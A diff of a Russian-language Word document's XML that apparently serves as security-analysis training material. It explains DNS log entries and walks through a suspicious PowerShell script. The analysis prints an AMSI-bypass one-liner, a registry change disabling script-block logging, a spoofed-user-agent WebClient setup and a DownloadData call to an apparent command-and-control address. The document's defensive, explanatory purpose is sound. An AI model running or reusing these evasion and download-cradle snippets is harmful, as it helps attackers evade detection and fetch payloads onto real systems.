+        <w:t>Записи журнала делают запросы записей PTR (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Pointer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) для различных доменных имен. Записи PTR используются для обратного поиска DNS, позволяя сопоставлять IP-адрес с доменным именем.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2706,7 +2983,11 @@
         <w:t>Частые ответы NXDOMAIN</w:t>
       </w:r>
       <w:r>
-        <w:t>: Повторяющиеся ответы NXDOMAIN указывают, что запрошенные доменные имена (например, mggw-at-f3f0c6e992b7562598d9865b6fe8b3a6.com) отсутствуют в записях DNS, что может указывать на неправильную конфигурацию или сканирование на предмет несуществующих доменов.</w:t>
+        <w:t xml:space="preserve">: Повторяющиеся ответы NXDOMAIN указывают, что запрошенные доменные имена (например, mggw-at-f3f0c6e992b7562598d9865b6fe8b3a6.com) отсутствуют в записях </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>DNS, что может указывать на неправильную конфигурацию или сканирование на предмет несуществующих доменов.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2802,7 +3083,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>.</w:t>
+        <w:t>Что происходит согласно следующим событиям?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2819,7 +3100,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>.</w:t>
+        <w:t>Что означает это сообщение? Это подозрительно? Почему?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2836,7 +3117,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>.</w:t>
+        <w:t>Что вы можете сказать о журналах ниже?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2867,7 +3148,35 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>Этот скрипт, по-видимому, является скриптом PowerShell, который включает несколько ключевых компонентов, вероятно, направленных на манипулирование настройками PowerShell и выполнение потенциально вредоносного поведения. Вот разбивка его основных действий:</w:t>
+        <w:t xml:space="preserve">Этот скрипт, по-видимому, является скриптом </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, который включает несколько ключевых компонентов, вероятно, направленных на манипулирование настройками </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> и выполнение потенциально вредоносного поведения. Вот разбивка его основных действий:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2889,8 +3198,18 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Проверка версии PowerShell</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Проверка версии </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2901,7 +3220,63 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> powershell IF ($PSVersionTable.PSVersion.Major -ge 3) { Скрипт проверяет, является ли версия PowerShell 3 или выше, что является распространенным способом обеспечения совместимости с определенными функциями. </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> IF ($</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>PSVersionTable.PSVersion.Major</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>ge</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 3) { Скрипт проверяет, является ли версия </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 3 или выше, что является распространенным способом обеспечения совместимости с определенными функциями. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2923,8 +3298,18 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Манипуляция параметрами групповой политики powershell</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Манипуляция параметрами групповой политики </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2959,13 +3344,37 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Изменение реестра powershell</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging']=$Val Скрипт изменяет параметры реестра, связанные с ведением журнала блоков скриптов PowerShell, эффективно отключая функции ведения журнала, которые обычно регистрируют выполнение скрипта. </w:t>
+        <w:t xml:space="preserve">Изменение реестра </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging']=$Val Скрипт изменяет параметры реестра, связанные с ведением журнала блоков скриптов </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, эффективно отключая функции ведения журнала, которые обычно регистрируют выполнение скрипта. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2997,247 +3406,426 @@
           <w:bCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> AMSI</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
+        <w:t xml:space="preserve"> AMSI:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [Ref].</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Assembly.GetType</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>('</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>System.Management.Automation.AmsiUtils</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">') | ?{$_} | %{ $_.GetField('amsiInitFailed','NonPublic,Static').SetValue($NULL,$True) }; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Эта</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>часть</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>пытается</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>обойти</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>интерфейс</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>сканирования</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>вредоносных</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>программ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (AMSI), </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>устанавливая</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>поле</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>которое</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>указывает</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>на</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>сбой</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>инициализации</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> AMSI. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Это часто делается во вредоносных скриптах, чтобы избежать обнаружения программным обеспечением безопасности. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">5. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Инициализация веб-клиента </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> powershell [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') | ?{$_} | %{ $_.GetField('amsiInitFailed','NonPublic,Static').SetValue($NULL,$True) }; </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>Эта</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WC=New-Object </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>System.Net.WebClient</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">; $u='Mozilla/5.0(Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>like</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>часть</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>пытается</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>обойти</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>интерфейс</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>сканирования</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>вредоносных</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>программ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (AMSI), </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>устанавливая</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>поле</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>которое</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>указывает</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>на</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>сбой</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>инициализации</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> AMSI. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Это часто делается во вредоносных скриптах, чтобы избежать обнаружения программным обеспечением безопасности. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">5. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Инициализация веб-клиента powershell</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Gecko</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>'; $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>WC.Headers.Add</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>('</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>User-Agent',$u</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">); Создается новый веб-клиент, и добавляется строка </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>user-agent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> для имитации легитимного веб-браузера. Это обычно используется для избежания обнаружения при выполнении веб-запросов. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">6. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Загрузка данных </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -3250,30 +3838,68 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> $WC=New-Object System.Net.WebClient; $u='Mozilla/5.0(Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'; $WC.Headers.Add('User-Agent',$u); Создается новый веб-клиент, и добавляется строка user-agent для имитации легитимного веб-браузера. Это обычно используется для избежания обнаружения при выполнении веб-запросов. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">6. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Загрузка данных powershell</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>DAtA</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>=$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>WC.DownloadData</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">($SER+$T); Скрипт создает URL-адрес и загружает с него данные. Похоже, он подключается к локальному IP-адресу (10.6.100.123), что может указывать на сервер управления и контроля или другой вредоносный источник. </w:t>
